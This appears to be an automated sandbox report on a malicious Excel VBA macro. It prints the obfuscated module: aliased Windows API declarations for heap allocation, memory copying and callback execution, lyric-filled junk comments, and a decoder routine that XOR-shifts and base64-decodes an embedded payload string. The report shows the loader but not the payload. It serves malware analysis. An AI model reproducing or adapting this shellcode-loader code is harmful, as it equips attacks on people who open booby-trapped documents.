1 | Attribute VB_Name = "andosite" |
2 | 'they say in Jamaica they sell ganja by the kilo |
3 | 'and to make the taste better, with a spoonful of Vegeta |
4 | #if Win64 then |
5 | 'They say they'll never stop filling our heads |
6 | 'As long as there are sheep there'll be no shortage of wool |
7 | Public Declare PtrSafe Function inserted Lib "kernel32" Alias "CreateEventA"(lpEventAttributes as Any, bManualReset as LongPtr, bInitialState as LongPtr, lpName as String) |
8 | 'They say don't drink hot water, around here a draught kills |
9 | 'They say what grandma fancies is what she dreams of |
10 | Public Declare PtrSafe Function impissation Lib "kernel32" Alias "HeapCreate"(ByVal abortive as LongPtr, ByVal gyratory as LongPtr, ByVal soldering as LongPtr) as LongPtr |
11 | 'As long as there are sheep there'll be no shortage of wool |
12 | 'and that the banks dragged us into the crisis |
13 | Public Declare PtrSafe Sub methyltestosterone Lib "ntdll" Alias "RtlMoveMemory"(pDst as Any, pSrc as Any, ByVal ByteLen as LongPtr) |
14 | 'Our pants have dropped, we've bitten the hooks |
15 | 'From the Vatican to Iran |
16 | Public Declare PtrSafe Function collinear Lib "gdi32" Alias "SelectObject"(hdc as Any, hgdiobj as LongPtr) |
17 | 'and that the banks dragged us into the crisis |
18 | 'They say they'll never stop filling our heads |
19 | Public Declare PtrSafe Function cyclosporeae Lib "kernel32" Alias "GetPriorityClass"(hProcess as LongPtr) as LongPtr |
20 | 'They say Iran is making nuclear bombs again |
21 | 'From the Vatican to Iran |
22 | Public Declare PtrSafe Function substituted Lib "user32" Alias "CopyIcon"(ByVal hIcon as LongPtr) as LongPtr |
23 | 'They say don't drink hot water, around here a draught kills |
24 | 'Our pants have dropped, we've bitten the hooks |
25 | Public Declare PtrSafe Function nard Lib "user32" Alias "EndDialog"(ByVal hDlg as LongPtr, nResult as LongPtr) as LongPtr |
26 | 'They say don't drink hot water, around here a draught kills |
27 | 'they say in Jamaica they sell ganja by the kilo |
28 | Public Declare PtrSafe Function arranger Lib "kernel32" Alias "EnumResourceTypesW"(ByVal hModule as Any, ByVal lpEnumFunc as Any, lParam as Any) as LongPtr |
29 | 'Our pants have dropped, we've bitten the hooks |
30 | 'a banana is enough for a monkey |
31 | Public Declare PtrSafe Function plevna Lib "kernel32" Alias "HeapAlloc"(ByVal asterismal as LongPtr, ByVal cholelithiasis as LongPtr, ByVal enveloping as LongPtr) as LongPtr |
32 | 'From the Vatican to Iran |
33 | 'They drag me to the polls every two years |
35 | 'They say the stork brings us little children |
36 | 'They drag me to the polls every two years |
37 | #else |
38 | 'miracle soap against stubborn stains |
39 | 'They drag me to the polls every two years |
40 | Public Declare Sub methyltestosterone Lib "ntdll" Alias "RtlMoveMemory"(pDst as Any, pSrc as Any, ByVal ByteLen as Long) |
41 | 'They say Iran is making nuclear bombs again |
42 | 'Our heads in the sand, our backsides unprotected |
43 | Public Declare Function overseer Lib "gdi32" Alias "SelectObject"(hdc as Any, hgdiobj as Long) |
44 | 'They say they'll never stop filling our heads |
45 | 'a banana is enough for a monkey |
46 | Public Declare Function grains Lib "kernel32" Alias "GetPriorityClass"(hProcess as Long) as Long |
47 | 'They say they'll never stop filling our heads |
48 | 'As long as there are sheep there'll be no shortage of wool |
49 | Public Declare Function ninnyhammer Lib "user32" Alias "EndDialog"(ByVal hDlg as Long, nResult as Long) as Long |
50 | 'and that we're at the top of the list for "brain" drain |
51 | 'They say Bosnia is just a country for relatives |
52 | Public Declare Function beige Lib "kernel32" Alias "CreateEventA"(lpEventAttributes as Any, bManualReset as Long, bInitialState as Long, lpName as String) |
53 | 'They say Bosnia is just a country for relatives |
54 | 'They say Bosnia is just a country for relatives |
55 | Public Declare Function arranger Lib "kernel32" Alias "EnumResourceTypesW"(ByVal hModule as Any, ByVal lpEnumFunc as Any, lParam as Any) as Long |
56 | 'They say Bosnia is just a country for relatives |
57 | 'They say Bosnia is just a country for relatives |
58 | Public Declare Function lyking Lib "user32" Alias "CopyIcon"(hIcon as Long) as Long |
59 | 'They say the end of the world is relatively near |
60 | 'we played well but the referee screwed us over |
61 | Public Declare Function plevna Lib "kernel32" Alias "HeapAlloc"(ByVal reportable as Long, ByVal melanosis as Long, ByVal macrencephaly as Long) as Long |
62 | 'They say they'll never stop filling our heads |
63 | 'we played well but the referee screwed us over |
64 | Public Declare Function impissation Lib "kernel32" Alias "HeapCreate"(ByVal relentless as Long, ByVal definable as Long, ByVal indefectibility as Long) as Long |
65 | 'and that the banks dragged us into the crisis |
66 | 'They say don't drink hot water, around here a draught kills |
68 | 'and that only bottled water is healthy |
69 | 'and I vote for the tavern and marijuana |
70 | #endif |
71 | 'They say they'll never stop filling our heads |
72 | 'They say don't drink hot water, around here a draught kills |
Executed Functions |
---|
APIs | Meta Information |
---|---|
Mid | |
Asc | |
CByte | |
UBound | |
Mid | |
LCase | |
Mid | |
UCase | |
Left | |
UCase | |
Left | |
Mid | |
Left | |
LCase | |
UBound | |
UCase | |
LCase | |
Mid | |
UBound |
Strings | Decrypted Strings |
---|---|
"impregnated" | |
"impregnated" | |
"dingcryosteoarthritis" | |
"semiliteratecacongeries" | |
"semiliteratecacongeries" | |
"dingcryosteoarthritis" | |
"eNDO" | |
"stazadirachta" | |
"eNDO" | |
"stazadirachta" | |
"di" | |
"sGui" | |
"sU" | |
"di" | |
"sGui" | |
"sU" | |
"coolant" |
Line | Instruction | Meta Information |
---|---|---|
85 | Function phonocamptic(compulsory) as String | |
86 | Dim brassiere as Integer | executed |
88 | Dim recency as Long | |
89 | Dim breakfast as Long | |
90 | Dim orions as Integer | |
92 | Dim farceur(255) as Byte | |
93 | Dim kaffiyeh() as Byte | |
94 | Dim graveunknelld as String | |
95 | Dim abaft as Long | |
97 | Dim givers as Long | |
98 | Dim hyperon(63) as Long | |
99 | Dim burhinidae(63) as Long | |
100 | Dim apnea(63) as Long | |
101 | Dim hind() as Byte | |
102 | munching = munching / 91 | |
104 | munching = munching + 461 | |
106 | Dim homogenate as Long | |
107 | Dim baptismal as Integer | |
108 | Dim semicolon as Byte | |
110 | grail = 105 + 262039 | |
111 | impeccant = 24 + 66 + 166 | |
112 | mechanic = 65536 | |
113 | Dim idemnity as Byte | |
115 | jewess = 65280 | |
116 | defensively = 67 + 26 + 4003 | |
117 | fortune = 86 - 22 | |
118 | Dim unintermitting as Integer | |
120 | mostaccioli = 128 - 26 - 8 + 257954 | |
121 | northeasterly = 16515072 | |
122 | rhagoletis = 108 + 16711572 | |
123 | glaucium = 59 + 4 | |
124 | condiment = 4032 | |
125 | sharper = 255 | |
126 | Dim sobersides as Variant | |
127 | Dim starchy() as Byte | |
128 | Redim starchy(4295) | |
129 | novelette = 4296 | |
130 | For i = 1 To novelette | |
131 | doxy = Mid(compulsory, i, 1) | Mid |
132 | inarticulately = (Asc(doxy)) | Asc |
133 | starchy(i - 1) = ((CByte(inarticulately))) | CByte |
134 | Next | |
135 | Dim infernal as Long | |
136 | nationalist = 10 | |
137 | While nationalist < 13 | |
138 | nationalist = nationalist + 1 | |
139 | hydrocharitaceae = "impregnated" | |
140 | Wend | |
142 | evection = UBound(starchy) | UBound |
143 | laughably = 22 | |
144 | For unstressed = 0 To evection | |
145 | starchy(unstressed) = starchy(unstressed) + 2 | |
146 | starchy(unstressed) = starchy(unstressed) Xor laughably | |
147 | Next unstressed | |
148 | dequet = 73 | |
149 | clementine = 91 | |
150 | If dequet + clementine < 4 Then | |
151 | dequet = Mid("semiliteratecacongeries", 13, 2) + LCase("SED") | Mid LCase |
152 | hydrocharitaceae = titubate | |
153 | ovation = Mid("dingcryosteoarthritis", 5, 3) + UCase("OSuRg") + Left("erycoding", 3) | Mid UCase Left |
154 | Else | |
155 | munching = differ - 387 | |
156 | clementine = 12 | |
157 | Endif | |
159 | baptismal = 0 | |
160 | paprika = 99 + 23 | |
161 | reasonable = 255 | |
162 | For homogenate = 0 To reasonable | |
163 | Select Case homogenate | |
164 | Case 65 To 90 | |
165 | farceur(homogenate) = homogenate - 65 | |
166 | Case 97 To paprika | |
167 | farceur(homogenate) = homogenate - 71 | |
168 | Case 48 To 57 | |
169 | farceur(homogenate) = homogenate + 4 | |
170 | Case 43 | |
171 | farceur(homogenate) = 62 | |
172 | Case 47 | |
173 | farceur(homogenate) = 63 | |
174 | End Select | |
175 | Next homogenate | |
176 | For homogenate = 0 To 63 | |
177 | burhinidae(homogenate) = homogenate * fortune | |
178 | hyperon(homogenate) = homogenate * defensively | |
179 | apnea(homogenate) = homogenate * grail | |
180 | Next homogenate | |
181 | For litteraire = 13 To 55 | |
182 | deformed = 55 | |
183 | differ = differ \ 476 | |
184 | stocks = UCase("eNDO") + Left("parasimany", 6) + Mid("chemakuantegrains", 10, 2) | UCase Left Mid |
185 | stocks = Left("stazadirachta", 2) & LCase("RAIn") | Left LCase |
186 | Next litteraire | |
188 | kaffiyeh = starchy | |
189 | crax = 4 | |
190 | Redim hind((((UBound(kaffiyeh) + 1) \ crax) * 3) - 1) | UBound |
191 | isochronism = 72 | |
192 | negotiate = 91 | |
193 | If isochronism + negotiate < 28 Then | |
194 | isochronism = "di" + UCase("sGui") + "sement" | UCase |
195 | munching = munching And 326 | |
196 | barbital = LCase("sU") & Mid("cholerberousblackamoor", 7, 6) | LCase Mid |
197 | Else | |
198 | munching = differ \ 409 | |
199 | negotiate = 38 | |
200 | Endif | |
202 | achillea = 3 | |
203 | titubate = "coolant" | |
205 | hydrocharitaceae = titubate | |
207 | gorgonzola = achillea + 1 | |
208 | For breakfast = 0 To UBound(kaffiyeh) Step gorgonzola | UBound |
209 | mentioning = kaffiyeh(breakfast) | |
210 | givers = apnea(farceur(mentioning)) + hyperon(farceur(kaffiyeh(breakfast + 1))) + burhinidae(farceur(kaffiyeh(breakfast + 2))) + farceur(kaffiyeh(breakfast + achillea)) | |
212 | homogenate = mercenaria(givers, rhagoletis) | |
213 | hind(recency) = cynoglossidae(homogenate, mechanic) | |
214 | homogenate = mercenaria(givers, jewess) | |
215 | hind(recency + 1) = cynoglossidae(homogenate, impeccant) | |
216 | hind(recency + 2) = mercenaria(givers, sharper) | |
217 | recency = recency + 3 | |
218 | Next breakfast | UBound |
219 | phonocamptic = hind | |
220 | End Function |
Line | Instruction | Meta Information |
---|---|---|
79 | Function cynoglossidae(curdling, dropout) | |
80 | cynoglossidae = curdling \ dropout | executed |
81 | End Function |
Line | Instruction | Meta Information |
---|---|---|
82 | Function mercenaria(anaphrodisia, foulard) | |
83 | mercenaria = anaphrodisia And foulard | executed |
84 | End Function |
Non-Executed Functions |
---|
APIs | Meta Information |
---|---|
Visible |
Strings | Decrypted Strings |
---|---|
"Sheet2" |
Line | Instruction | Meta Information |
---|---|---|
73 | Sub sbHideASheet() | |
74 | Sheet2.Visible = False | Visible |
75 | 'OR You can mention the Sheet name | |
76 | Sheets("Sheet2").Visible = True | |
77 | End Sub |
Module: crappie |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "crappie" |
2 | Attribute VB_Base = "0{9AD81DE8-62E1-4795-AE66-E0FE682BA917}{5B5AFF87-D297-46C7-8183-E8213D3D5C4C}" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = False |
7 | Attribute VB_TemplateDerived = False |
8 | Attribute VB_Customizable = False |